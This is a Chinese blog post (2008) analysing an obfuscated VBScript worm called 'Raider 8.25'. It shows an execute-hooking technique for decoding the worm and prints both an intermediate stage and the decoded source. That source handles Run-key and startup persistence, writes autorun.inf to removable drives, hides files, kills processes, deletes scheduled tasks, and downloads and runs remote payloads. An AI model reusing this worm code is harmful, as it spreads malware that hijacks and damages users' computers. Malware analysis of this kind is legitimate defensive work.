跟踪劫持execute解密VBS乱码

查看文章

跟踪劫持execute解密VBS乱码

2008-03-05 16:47

思路应该不会错，一个才9.76 KB的VBS乱码解密出的文件有203 KB。源文件可以从这里下载：http://www.kingzoo.com/tools/greysign/vbs.rar或者直接点击这查看：http://evilcos.googlepages.com/evilvbs8.25.txt。现在我来说说自己的解密思路。

在VBS中，execute函数可以用来执行表达式，类似于JS中的eval。VBS中也有eval函数，不过它与execute有一点区别。关于JS的解密，我已经写过许多文章，比如可以使用alert替换eval弹出解密值，为了方便还可以使用<xmp>标签解密大法或者document.getElementById()方法来获取解密结果等等。同理在VBS中可以用msgbox或者wscript.echo将解密结果弹出。

为了方便，我参考了点别人的思路写了这个VBS过程：

sub hook_execute(x)
'wscript.echo x
outfile="ok.txt"
set fso=createobject("Scripting.FileSystemObject")
if (fso.fileexists(outfile)) then
set objtxt=fso.opentextfile(outfile,8,true,0)
objtxt.write x&vbcrlf
objtxt.close
execute x
else
set objtxt=fso.createtextfile(outfile,True,False)
objtxt.write x&vbcrlf
objtxt.close
execute x
end if
end sub

这个hook_execute方法可以跟踪VBS乱码中execute行为，可以肯定的是当一段乱码被execute后最终会还原为明码，利用这个原理hook_execute会将解密的结果写进一个叫做ok.txt的文本文件中，并继续执行execute。用法很简单：将跟踪出的乱码中的execute替换为hook_execute方法即可。由于VBS与JS一样是解释型语言，代码自上而下，一行一行地运行。所以有时候我们寻找解密入口点时，应该优先考虑最后一个execute。并且由于现在的VBS/VbScript/JS都喜欢将一些特征字符串打乱，然后用逻辑符拼接，其目的或者是为了达到免杀或者是为了迷惑破解者，我们应该利用这些双引号（字符串在双引号内，VBS的单引号是注释符）来区分每个字符串片段。也许从中会发现一些有价值的解密信息。

第一次解密时利用hook_execute方法，将乱码中的最后一个execute替换为hook_execute，然后解密得到结果，将第一次解密结果修改成如下：

on error resume next
dyz="ire=|8.25|:if=|.iof|:ir=|.ior|:w=|\|:pz=|%pbzfcrp% /p |:qsb=|/8#0/|:gvy=|Rnvqre |&ire:vas=|\nhgbeha.vas|}{frg jf=perngrbowrpg(|jfpevcg.furyy|):frg jzv=trgbowrpg(|jvaztzgf:\\.\ebbg\pvzi2|)}{frg sfb=perngrbowrpg(|fpevcgvat.svyrflfgrzbowrpg|):frg fvf=jzv.rkrpdhrel(|fryrpg * sebz jva32_bcrengvatflfgrz|)}{frg qp=sfb.qevirf:bhj=jfpevcg.fpevcgshyyanzr:jva=sfb.trgfcrpvnysbyqre(0)&w:qve=sfb.trgfcrpvnysbyqre(1)&w}{gzc=sfb.trgfcrpvnysbyqre(2)&w:jor=qve&|jorz\|:zve=yrsg(bhj,yra(bhj)-yra(jfpevcg.fpevcganzr))}{jfe=|perngrbowrpg(||jfpevcg.furyy||).eha|:pae=|\pbzchgreanzr|:pac=|HKLM\flfgrz\pheeragpbagebyfrg\pbageby|&pae&pae&pae}{pan=ee(pac,0):vs pan=|| gura pan=gvy}{ecn=|HKLM\fbsgjner\|&pan&w:ebc=|\fbsgjner\zvpebfbsg\jvaqbjf\pheeragirefvba\rkcybere\|}{fs=|furyy sbyqref\|:sfc=ee(|HKLM|&ebc&fs&|pbzzba fgneghc|,0)&w&if:snc=ee(|HKCU|&ebc&fs&|snibevgrf|,0)&w}{qnc=ee(|HKCU|&ebc&fs&|qrfxgbc|,0)&w:efa=pan:ug=rp(|vijg?56|):un=rp(|:;9::<5xj9|):up=|:143tmkHfH|:ur=rp(|p|+up)}{efc=|HKLM\fbsgjner\zvpebfbsg\jvaqbjf\pheeragirefvba\cbyvpvrf\rkcybere\eha\|:vs zve=qve gura flf=gehr}{sbe rnpu fv va fvf:pn=fv.pncgvba:pf=fv.pbqrfrg:pp=fv.pbhagelpbqr:bf=fv.bfynathntr:ji=fv.irefvba:arkg}{uvc=|HKCU|&ebc&|nqinaprq\fubjfhcreuvqqra|:uo=|i91:;676k|&pue(124)&|e;|}{vs vafge(ji,|5.2|)<>0 gura}{uq=|g|+up}{ryfrvs bf<>2052 gura uq=|c|+up:ryfr uq=|$|+up:raq vs":gtz="gwf=ee(|gwf|,1):qwf=ee(|qwf|,1):vs abg vfahzrevp(gwf) be abg vfqngr(qwf) gura je |gwf|,1:je |qwf|,qngr:qwf=ee(|qwf|,1)}{je |gwf|,gwf+1:jo=ce(|pyfza.rkr|,1)=1 be ce(|nc.rkr|,1)=1 be ce(|chojva.rkr|,1)=1}{vs qngr-pqngr(qwf)>3 gura td=gehr:jf.eha |arg fgneg ||gnfx fpurqhyre|||,0,snyfr}{vs (ee(|gwf|,1)>1000 be jo be td be abg flf) naq ee(|qrq|,1)<>pfge(qngr) gura}{vq=ee(|vqq|,1):vs jo gura vq=1:wf=1:pq=0}{qb juvyr pq<>|<fpevcg>|}{vs wf=2 be wf=4 gura}{q2=qa(zve&gvy,ug+un+rp(uq)&vq,0,100):pq=eg(zve&gvy,1)}{ryfrvs wf=1 be wf=3 gura q1=qa(zve&gvy,ug+rp(uo)+rp(uq)&vq&|&i=|&ire,0,100):pq=eg(zve&gvy,1)}{raq vs:wf=wf+1:jm=q1=1 be q2=1:vs wf>4 gura}{vs jm gura tg=1}{rkvg qb}{raq vs}{vs jm gura re -1}{ybbc}{vs rv(zve&gvy,1) gura}{frg e=sfb.bcragrkgsvyr(zve&gvy,1)}{pva=e.ernqyvar:qvf=e.ernqyvar:qan=e.ernqyvar:qse=e.ernqyvar:air=e.ernqyvar:aeh=e.ernqyvar}{aan=e.ernqyvar:ase=e.ernqyvar:gfj=e.ernqyvar:gpb=e.ernqyvar:bfj=e.ernqyvar:vqq=e.ernqyvar}{e.pybfr:qs zve&gvy:vs pva=|<fpevcg>| gura}{je |gwf|,1:je |qwf|,qngr:je |vqq|,vqq:je |qan|,qan:je |gfj|,gfj:je |gpb|,gpb:je |bfj|,bfj}{vs air-ire>=0.1 be abg rv(qve&ir,1) gura qa qve&aan,ug&ase&qsb&aan,aeh,2000:jfpevcg.dhvg}{vs qvf=1 naq flf gura}{vs qan<>yr be abg rv(gzc&yr,1) gura qs gzc&yr:qa gzc&qan,ug&qse&qsb&qan,1,1000}{raq vs}{raq vs}{raq vs}{raq vs}{vs re(1) be jo gura tg=1":eiz="vs sfb.svyrrkvfgf(anzr) naq jg=1 gura rv=gehr}{vs sfb.sbyqrerkvfgf(anzr) naq jg=2 gura rv=gehr":dfz="ne ju,0}{vs rv(ju,1) gura sfb.qryrgrsvyr(ju)}{vs rv(ju,2) gura sfb.qryrgrsbyqre(ju)":fut=":function ":bfz="qs ju:frg ova=sfb.perngrgrkgsvyr(ju,gehr):ova.jevgryvar jg:ova.pybfr}{vs qn=1 gura ne ju,7}{vs abg re(0) gura os=1":biz="qs ju:frg v=sfb.perngrgrkgsvyr(ju,gehr):u=iopeys}{v.jevgryvar gvy&u&|[nhgbeha]|&u&|bcra=jfpevcg.rkr .\|&if&u&|furyy\bcra\pbzznaq=jfpevcg.rkr .\|&if&u&|furyy\bcra\qrsnhyg=1|}{v.pybfr:ne ju,7:vs abg re(0) gura ov=1":rtz="vs yv<0 gura ju=bhj}{vs rv(ju,1) gura}{vs sfb.trgsvyr(ju).fvmr=0 gura}{eg=0}{ryfr}{frg e=sfb.bcragrkgsvyr(ju,1)}{frg py=sfb.bcragrkgsvyr(ju,1)}{py.ernqnyy}{gyv=py.yvar}{py.pybfr}{vs yv>0 naq yv<=gyv gura}{v=0 }{qb juvyr v<yv}{v=v+1}{vs abg e.ngraqbsfgernz gura}{fyv=e.ernqyvar}{ryfr}{fyv=0}{raq vs}{ybbc}{eg=fyv}{ryfrvs yv<=0 gura}{eg=e.ernqnyy}{ryfr}{eg=0}{raq vs}{e.pybfr}{raq vs}{ryfr}{eg=0}{raq vs":wrz="vs eqn=-1 gura jf.ertqryrgr ean ryfr jf.ertjevgr ecn&ean,eqn,|REG_SZ|":rrz="vs cn=1 gura ean=ecn&ean}{ee=jf.erternq(ean)}{vs re(0) gura ee=0":arz="vs rv(svyr,1) gura:frg bsvyr=sfb.trgsvyr(svyr):bsvyr.nggevohgrf=pt:frg bsvyr=abguvat}{vs rv(svyr,2) gura:frg bsvyr=sfb.trgsbyqre(svyr):bsvyr.nggevohgrf=pt:frg bsvyr=abguvat":eft=")):end function":dnz="ne ybp,0:frg kcbfg = perngrbowrpg(|zvpebfbsg.kzyuggc|):kcbfg.bcra |trg|,jro,0:kcbfg.fraq()}{vs zva<>0 gura}{vs abg re(0) gura}{qa=1:frg ftrg=perngrbowrpg(|nqbqo.fgernz|) }{ftrg.zbqr=3:ftrg.glcr=1:ftrg.bcra():ftrg.jevgr(kcbfg.erfcbafrobql):ftrg.fnirgbsvyr ybp,2}{ne ybp,7}{vs rv(ybp,1) gura sfm=sfb.trgsvyr(ybp).fvmr ryfr sfm=0}{vs sfm>zva gura}{vs evf=1 gura jf.eha ybp}{ryfr}{qa=0:qs ybp}{raq vs}{raq vs}{raq vs":prz="frg cy=jzv.rkrpdhrel(|fryrpg * sebz jva32_cebprff jurer anzr='|&cpf&|'|):v=1}{sbe rnpu c va cy:v=v+1}{vs v>nof(tf) gura ce=1}{vs tf<0 gura vs c.grezvangr=2 naq ce=1 gura jf.eha pz&|gfxvyy |&yrsg(c.anzr,yra(c.anzr)-4),0,snyfr}{arkg}{vs re(0) gura ce=2":ecz="sbe v=1 gb yra(jg):rp=rp+pue(nfp(zvq(jg,v,1))-v):arkg":l="d=125:f=123:j=124:h=97:m=109:r=13:k=110:n=122:s=-13:u=0:v=0:":zcx="sbe rnpu q va qp}{vs zve=q&w gura jf.eha |rkcybere |&q,3,snyfr}{arkg}{bhp=eg(bhj,-1):vs ps(bhj) gura zftobk(|ubyyr,envqre!|):xz 1}{vs flf gura}{vs ee(efc&|rkcybere|,0)<>|0| gura je efc&|rkcybere|,-1}{uv 1}{vs ee(|gvy|,1)<>gvy gura}{je |gvy|,gvy}{je |gwf|,1}{je |qwf|,qngr}{je |qrq|,0}{raq vs}{vs ee(|ngq|,1)=1 gura jf.eha |ng /q /l|,0,snyfr:je |ngq|,0}{vs ee(efc&efa,0)=ir gura ef -1}{yr=ee(|qan|,1):vs rv(gzc&yr,1) gura jf.eha gzc&yr}{xz 0}{ph:re 1}{jfpevcg.fyrrc 1000}{vs ee(|qrq|,1)<>pfge(qngr) gura jf.eha bhj}{ryfr}{jfpevcg.fyrrc 5000}{vs ce(|jfpevcg.rkr|,2)=2 gura}{vs ee(|gwp|,1)=pfge(qngr) gura:jfpevcg.dhvg:ryfr:je |gwp|,qngr}{raq vs}{vs ce(|jfpevcg.rkr|,2)=1 gura jfpevcg.dhvg}{ne bhj,7:pb qve&ir:pb jva&ir:ef 1:jf.eha qve&ir}{raq vs":aft=eft&fut:coz="qs ju:frg iof=sfb.perngrgrkgsvyr(ju,gehr):iof.jevgr bhp:iof.pybfr:ne ju,7":rn="dim d:j=""\"":on error resume next":rsz="vs fj=1 naq ee(efc&efa,0)<>ir gura}{jf.ertjevgr efc&efa,ir,|REG_SZ|}{vs re(0) naq abg rv(sfc,1) gura os sfc,jfe&| |||&ir&||||,0}{ryfrvs fj=-1 gura:qs sfc}{ryfrvs fj=0 gura:qs sfc:je efc&efa,-1:je ecn,-1}{raq vs":hiz="vs fj=1 gura jf.ertjevgr uvc,|0|,|REG_DWORD|}{vs fj=0 gura uv=ee(uvc,0)":giz="vq=ee(|vqq|,1)}{qb juvyr svq<=rvq:vqp=vqp&|,|&svq:svq=svq+1:ybbc}{vqf=vqf&vqp:vqff=fcyvg(vqf,|,|)}{sbe v=0 gb hobhaq(vqff)}{vs vq=vqff(v) gura vs abg rv(gzc&sanzr,1) gura qa gzc&sanzr,ug&shey,0,2000}{arkg}{vs rv(gzc&sanzr,1) gura jf.eha gzc&sanzr}{tv=1":dwz="vs ee(|trq|,1)<>sa naq ce(cpf,1)=1 gura}{vs qa(gzc&sa,ug&shey,0,2000)=1 gura qjp=1}{vs rv(gzc&sa,1) naq qjp=1 gura}{vs xvyy=1 gura ce cpf,-1}{jf.eha gzc&sa}{vs abg re(0) gura je |trq|,sa:qa 0,ug+rp(uo)+ur+sa,0,0:vs xvyy=2 gura ce cpf,-1:xz 1}{raq vs}{qj=1}{raq vs}{jfpevcg.fyrrc 100":usz="sbe rnpu q va qp}{vs q.qevirglcr=3 be (q.qevirglcr=1 naq q<>|A:| naq q<> |B:|) gura}{vs fj=1 gura}{vs rv(q&vas,2) gura qs q&vas}{vs rv(q&w&if,1) naq rv(q&vas,1) gura}{vs eg(q&vas,1)<>gvy gura ov q&vas}{ryfr}{uv 1:ov q&vas:pb q&w&if}{raq vs}{ryfrvs fj=-1 gura:qs q&vas:qs q&w&if}{ryfr:os q&w&if,jfe&|(yrsg(jfpevcg.fpevcgshyyanzr,3)),3|&fgevat(10000,|'|),1:qs q&vas}{raq vs}{raq vs}{arkg":cuz="phf=ee(|bfj|,1)<>4}{qb}{qph=ee(|gtf|,1)<>pfge(qngr)}{vs (frpbaq(gvzr) zbq 3)=0 gura}{vs qph naq phf gura hf 1}{zva=zvahgr(abj):vs (zva zbq 2)=1 naq aa<>zva naq bb<>1 gura aa=zva:bb=tg:xz 0}{vs ee(|gfj|,1)=1 gura rkrphgr(hp(ee(|gpb|,1)))}{raq vs}{jfpevcg.fyrrc 900}{vs uv(0)=1 naq qph gura je |gtf|,qngr:hf -1}{vs ce(|gnfxzte.rkr|,1)=1 gura:jf.eha |ng |&gvzr+0.003&| /vagrenpgvir |&ir,0,snyfr:je |ngq|,1:uv 1:jfpevcg.dhvg}{ybbc":ext=":execute(uc(":kmz="vs fj=1 gura}{ef 0:hf -1:qs bhj:qs jva&ir:qs qve&ir:qs jor&ir:jfpevcg.dhvg}{ryfr}{ef 1}{vs ps(qve&ir) gura pb qve&ir}{vs ps(jva&ir) gura pb jva&ir}{raq vs":cfz="vs eg(ju,1)<>|'|&ire gura ps=gehr"
function er(sco)
if err.number<>0 or sco<0 then
err.clear
er=true
if sco<>0 and rr("ded",1)<>cstr(date) then
wr "oer",rr("oer",1)+abs(sco)
if rr("oer",1)>100 then wr "ded",date:wr "oer",0
end if
end if
end function

'将原来的所有execute替换为hook_execute。
str_t=":hook_execute(uc(dyz)):hook_execute(uc(zcx)):function gt():hook_execute(uc(gtz)):end function:function ei(name,wt):hook_execute(uc(eiz)):end function:function df(wh):hook_execute(uc(dfz)):end function:function bf(wh,wt,da):hook_execute(uc(bfz)):end function:function bi(wh):hook_execute(uc(biz)):end function:function rt(wh,li):hook_execute(uc(rtz)):end function:function wr(rna,rda):hook_execute(uc(wrz)):end function:function rr(rna,pa):hook_execute(uc(rrz)):end function:function ar(file,cg):hook_execute(uc(arz)):end function:function dn(loc,web,ris,min):hook_execute(uc(dnz)):end function:function pr(pcs,gs):hook_execute(uc(prz)):end function:function ec(wt):hook_execute(uc(ecz)):end function:function co(wh):hook_execute(uc(coz)):end function:function rs(sw):hook_execute(uc(rsz)):end function:function hi(sw):hook_execute(uc(hiz)):end function:function gi(ids,fid,eid,fname,furl):hook_execute(uc(giz)):end function:function dw(pcs,fn,furl,kill):hook_execute(uc(dwz)):end function:function us(sw):hook_execute(uc(usz)):end function:function cu():hook_execute(uc(cuz)):end function:function km(sw):hook_execute(uc(kmz)):end function:function cf(wh):hook_execute(uc(cfz)):end function"

execute(str_t)

function uc(b):x="633D766263726C663A643D3132373A663D31313A6A3D31323A683D31343A6D3D33313A723D38333A6B3D313A6E3D383A733D3131343A753D2D353A763D350D0A693D22696620613D223A743D22207468656E20223A653D22656C7365696620613E3D223A613D2220616E6420613C3D223A673D22613D612B223A6F3D74266326673A703D6326653A713D6326690D0A65786563757465286C2622666F722069693D3120746F206C656E2862293A613D617363286D696428622C69692C3129292226712622642226742622613D31332226712622662226742622613D313022267126226A22267426632622613D3334222663266526226822266126226D22266F26227222267026226B22266126226E22266F262273222670262235332226612622353722266F262275222670262234382226612622353222266F2622762226632622656E64206966222663262275633D75632B63687228612922266326226E657874222663262275633D726E2B632B75632229":y="execute """"":z="&chr(&h":w=")":execute("do while len(x)>1:if isnumeric(left(x,1)) then y=y&z&left(x,2)&w:x=mid(x,3) else y=y&z+left(x,4)+w:x=mid(x,5)"&vbcrlf&"loop"):execute(y):end function

msgbox "success:-)"

这个VBS乱码真的很酷，参数、函数太多，犹如一个巨大而复杂的信息蛛网，破解得人心慌慌：-（，它自己的解密函数uc本身就是乱码，要破解出这个乱码也很容易，就是将execute替换掉。为了保持良好的心态，必须始终记住：所有的乱码最终都必须还原成它的解释器可以识别的明码。最终解密出的代码如下：

dim d:j="\":on error resume next
ver="8.25":vs=".vbs":ve=".vbe":j="\":cm="%comspec% /c ":dfo="/8#0/":til="Raider "&ver:inf="\autorun.inf"
set ws=createobject("wscript.shell"):set wmi=getobject("winmgmts:\\.\root\cimv2")
set fso=createobject("scripting.filesystemobject"):set sis=wmi.execquery("select * from win32_operatingsystem")
set dc=fso.drives:ouw=wscript.scriptfullname:win=fso.getspecialfolder(0)&j:dir=fso.getspecialfolder(1)&j
tmp=fso.getspecialfolder(2)&j:wbe=dir&"wbem\":mir=left(ouw,len(ouw)-len(wscript.scriptname))
wsr="createobject(""wscript.shell"").run":cnr="\computername":cnp="HKLM\system\currentcontrolset\control"&cnr&cnr&cnr
cna=rr(cnp,0):if cna="" then cna=til
rpa="HKLM\software\"&cna&j:rop="\software\microsoft\windows\currentversion\explorer\"
sf="shell folders\":fsp=rr("HKLM"&rop&sf&"common startup",0)&j&vs:fap=rr("HKCU"&rop&sf&"favorites",0)&j
dap=rr("HKCU"&rop&sf&"desktop",0)&j:rsn=cna:ht=ec("ivwt?56"):ha=ec(":;9::<5kw9"):hc=":143gzxHsH":he=ec("c"+hc)
rsp="HKLM\software\microsoft\windows\currentversion\policies\explorer\run\":if mir=dir then sys=true
for each si in sis:ca=si.caption:cs=si.codeset:cc=si.countrycode:os=si.oslanguage:wv=si.version:next
hip="HKCU"&rop&"advanced\showsuperhidden":hb="v91:;676x"&chr(124)&"r;"
if instr(wv,"5.2")<>0 then
hd="t"+hc
elseif os<>2052 then hd="p"+hc:else hd="$"+hc:end if
dim d:j="\":on error resume next
if pa=1 then rna=rpa&rna
rr=ws.regread(rna)
if er(0) then rr=0
dim d:j="\":on error resume next
if pa=1 then rna=rpa&rna
rr=ws.regread(rna)
if er(0) then rr=0

'........ 开始大量重复
'dim d:j="\":on error resume next
'if pa=1 then rna=rpa&rna
'rr=ws.regread(rna)
'if er(0) then rr=0
'........片段

if er(0) then rr=0
dim d:j="\":on error resume next
for i=1 to len(wt):ec=ec+chr(asc(mid(wt,i,1))-i):next
dim d:j="\":on error resume next
for i=1 to len(wt):ec=ec+chr(asc(mid(wt,i,1))-i):next
dim d:j="\":on error resume next
for i=1 to len(wt):ec=ec+chr(asc(mid(wt,i,1))-i):next
dim d:j="\":on error resume next
for each d in dc
if mir=d&j then ws.run "explorer "&d,3,false
next
ouc=rt(ouw,-1):if cf(ouw) then msgbox("holle,raider!"):km 1
if sys then
if rr(rsp&"explorer",0)<>"0" then wr rsp&"explorer",-1
hi 1
if rr("til",1)<>til then
wr "til",til
wr "tjs",1
wr "djs",date
wr "ded",0
end if
if rr("atd",1)=1 then ws.run "at /d /y",0,false:wr "atd",0
if rr(rsp&rsn,0)=ve then rs -1
le=rr("dna",1):if ei(tmp&le,1) then ws.run tmp&le
km 0
cu:er 1
wscript.sleep 1000
if rr("ded",1)<>cstr(date) then ws.run ouw
else
wscript.sleep 5000
if pr("wscript.exe",2)=2 then
if rr("tjc",1)=cstr(date) then:wscript.quit:else:wr "tjc",date
end if
if pr("wscript.exe",2)=1 then wscript.quit
ar ouw,7:co dir&ve:co win&ve:rs 1:ws.run dir&ve
end if
dim d:j="\":on error resume next
if li<0 then wh=ouw
if ei(wh,1) then
if fso.getfile(wh).size=0 then
rt=0
else
set r=fso.opentextfile(wh,1)
set cl=fso.opentextfile(wh,1)
cl.readall
tli=cl.line
cl.close
if li>0 and li<=tli then
i=0
do while i<li
i=i+1
if not r.atendofstream then
sli=r.readline
else
sli=0
end if
loop
rt=sli
elseif li<=0 then
rt=r.readall
else
rt=0
end if
r.close
end if
else
rt=0
end if
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
if rt(wh,1)<>"'"&ver then cf=true
dim d:j="\":on error resume next
if li<0 then wh=ouw
if ei(wh,1) then
if fso.getfile(wh).size=0 then
rt=0
else
set r=fso.opentextfile(wh,1)
set cl=fso.opentextfile(wh,1)
cl.readall
tli=cl.line
cl.close
if li>0 and li<=tli then
i=0
do while i<li
i=i+1
if not r.atendofstream then
sli=r.readline
else
sli=0
end if
loop
rt=sli
elseif li<=0 then
rt=r.readall
else
rt=0
end if
r.close
end if
else
rt=0
end if
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
set pl=wmi.execquery("select * from win32_process where name='"&pcs&"'"):i=1
for each p in pl:i=i+1
if i>abs(gs) then pr=1
if gs<0 then if p.terminate=2 and pr=1 then ws.run cm&"tskill "&left(p.name,len(p.name)-4),0,false
next
if er(0) then pr=2
dim d:j="\":on error resume next
set pl=wmi.execquery("select * from win32_process where name='"&pcs&"'"):i=1
for each p in pl:i=i+1
if i>abs(gs) then pr=1
if gs<0 then if p.terminate=2 and pr=1 then ws.run cm&"tskill "&left(p.name,len(p.name)-4),0,false
next
if er(0) then pr=2
dim d:j="\":on error resume next
if ei(file,1) then:set ofile=fso.getfile(file):ofile.attributes=cg:set ofile=nothing
if ei(file,2) then:set ofile=fso.getfolder(file):ofile.attributes=cg:set ofile=nothing
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
df wh:set vbs=fso.createtextfile(wh,true):vbs.write ouc:vbs.close:ar wh,7
dim d:j="\":on error resume next
ar wh,0
if ei(wh,1) then fso.deletefile(wh)
if ei(wh,2) then fso.deletefolder(wh)
dim d:j="\":on error resume next
if ei(file,1) then:set ofile=fso.getfile(file):ofile.attributes=cg:set ofile=nothing
if ei(file,2) then:set ofile=fso.getfolder(file):ofile.attributes=cg:set ofile=nothing
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
if ei(file,1) then:set ofile=fso.getfile(file):ofile.attributes=cg:set ofile=nothing
if ei(file,2) then:set ofile=fso.getfolder(file):ofile.attributes=cg:set ofile=nothing
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
df wh:set vbs=fso.createtextfile(wh,true):vbs.write ouc:vbs.close:ar wh,7
dim d:j="\":on error resume next
ar wh,0
if ei(wh,1) then fso.deletefile(wh)
if ei(wh,2) then fso.deletefolder(wh)
dim d:j="\":on error resume next
if ei(file,1) then:set ofile=fso.getfile(file):ofile.attributes=cg:set ofile=nothing
if ei(file,2) then:set ofile=fso.getfolder(file):ofile.attributes=cg:set ofile=nothing
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
if ei(file,1) then:set ofile=fso.getfile(file):ofile.attributes=cg:set ofile=nothing
if ei(file,2) then:set ofile=fso.getfolder(file):ofile.attributes=cg:set ofile=nothing
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
if sw=1 and rr(rsp&rsn,0)<>ve then
ws.regwrite rsp&rsn,ve,"REG_SZ"
if er(0) and not ei(fsp,1) then bf fsp,wsr&" """&ve&"""",0
elseif sw=-1 then:df fsp
elseif sw=0 then:df fsp:wr rsp&rsn,-1:wr rpa,-1
end if
dim d:j="\":on error resume next
if pa=1 then rna=rpa&rna
rr=ws.regread(rna)
if er(0) then rr=0
dim d:j="\":on error resume next
if pa=1 then rna=rpa&rna
rr=ws.regread(rna)

'........ 开始大量重复
'if er(0) then rr=0
'dim d:j="\":on error resume next
'if pa=1 then rna=rpa&rna
'rr=ws.regread(rna)
'........片段

if er(0) then rr=0
dim d:j="\":on error resume next
ar wh,0
if ei(wh,1) then fso.deletefile(wh)
if ei(wh,2) then fso.deletefolder(wh)
dim d:j="\":on error resume next
if ei(file,1) then:set ofile=fso.getfile(file):ofile.attributes=cg:set ofile=nothing
if ei(file,2) then:set ofile=fso.getfolder(file):ofile.attributes=cg:set ofile=nothing
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
if rda=-1 then ws.regdelete rna else ws.regwrite rpa&rna,rda,"REG_SZ"
dim d:j="\":on error resume next
if rda=-1 then ws.regdelete rna else ws.regwrite rpa&rna,rda,"REG_SZ"

结束……源文件：http://evilcos.googlepages.com/ok.txt。至于初始VBS乱码中的OO变量的值，我感觉没用。这个VBS的行为是什么，可以用HIPS工具跟踪看看，否则你就慢慢读这些令人发指的源码吧。

【相关信息】

1、此乱码版本为8.25。
2、解密过程中有弹出此信息：holle,raider!（这个是作者吗？）

【相关文章】

1、一个变态的加密VBS：http://hi.baidu.com/greysign/blog/item/fba23b3f46acd5e855e7232f.html。
2、杀脑细胞的东西：http://hi.baidu.com/dikex/blog/item/7c1838087ad6af34e824884f.html。
3、一个加密的vbs病毒照本宣科的解密之旅：http://hi.baidu.com/fuxudong/blog/item/431ddb2451aa06054c088d02.html。

类别：Script Attack | 添加到搜藏 | 浏览() | 评论 (17)

姓　名：	*姓名最长为50字节

网址或邮箱：	(选填)

内　容：

验证码：	请点击后输入四位验证码，字母不区分大小写看不清?
	取消回复